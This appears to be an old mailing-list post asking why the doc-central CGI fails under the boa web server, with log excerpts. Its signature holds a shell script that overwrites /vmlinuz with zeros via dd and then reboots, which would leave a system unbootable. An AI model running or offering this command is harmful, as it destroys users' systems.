Don't know where the problem is exactly, but I'm trying to use the new doc-central (in woody) with the boa server and I get the 505 error.
The logs for boa aren't very informative: [05/Jul/2000:05:53:57 +0000] Forked child "/usr/lib/cgi-bin/dc-contents.cgi" pid 5766 [05/Jul/2000:05:53:58 +0000] cgi_header: unable to find LFLF [05/Jul/2000:05:53:58 +0000] reaping child 5766: status 0 So, does this combo work for anyone? Anyone know if this is a boa prob., doc-central prob., or a python problem? The dc-contents.cgi script runs okay from the command line. I think maybe boa isn't sending something the script wants (but can't be sure??). -- #! /bin/sh echo 'Linux Must Die!' | wall dd if=/dev/zero of=/vmlinuz bs=1 \ count=`du -Lb /vmlinuz | awk '{ /^([0-9])+/ ; print $1 }'` shutdown -r now